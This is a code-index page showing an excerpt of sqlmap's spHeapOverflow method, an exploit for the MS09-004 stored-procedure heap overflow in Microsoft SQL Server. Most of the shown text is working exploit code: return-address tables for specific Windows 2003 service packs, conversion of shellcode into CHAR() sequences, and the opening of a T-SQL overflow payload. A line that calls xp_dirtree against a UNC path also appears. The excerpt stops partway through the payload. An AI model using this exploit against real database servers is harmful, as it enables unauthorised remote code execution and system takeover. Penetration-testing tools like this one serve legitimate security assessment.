MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / spHeapOverflow

Method spHeapOverflow

plugins/dbms/mssqlserver/takeover.py:28–146  ·  view source on GitHub ↗

References: * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co

(self)

Source from the content-addressed store, hash-verified

26 inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
27
28 def spHeapOverflow(self):
29 """
30 References:
31 * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004
32 * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co
33 """
34
35 returns = {
36 # 2003 Service Pack 0
37 "2003-0": (""),
38
39 # 2003 Service Pack 1
40 "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),
41
42 # 2003 Service Pack 2 updated at 12/2008
43 # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),
44
45 # 2003 Service Pack 2 updated at 05/2009
46 "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
47
48 # 2003 Service Pack 2 updated at 09/2009
49 # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
50 }
51
52 addrs = None
53
54 for versionSp, data in returns.items():
55 version, sp = versionSp.split("-")
56 sp = int(sp)
57
58 if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp:
59 addrs = data
60
61 break
62
63 if not addrs:
64 errMsg = "sqlmap can not exploit the stored procedure buffer "
65 errMsg += "overflow because it does not have a valid return "
66 errMsg += "code for the underlying operating system (Windows "
67 errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack())
68 raise SqlmapUnsupportedFeatureException(errMsg)
69
70 shellcodeChar = ""
71 hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1]))
72
73 for hexPair in xrange(0, len(hexStr), 2):
74 shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2]
75
76 shellcodeChar = shellcodeChar[:-1]
77
78 self.spExploit = """DECLARE @buf NVARCHAR(4000),
79 @val NVARCHAR(4),
80 @counter INT
81 SET @buf = '
82 DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int
83 EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''
84 SET @val = CHAR(0x41)
85 SET @counter = 0

Callers 1

bofMethod · 0.80

Calls 8

getBytesFunction · 0.90
xrangeClass · 0.85
itemsMethod · 0.80
getOsVersionMethod · 0.80
getOsServicePackMethod · 0.80
infoMethod · 0.80
replaceMethod · 0.45

Tested by

no test coverage detected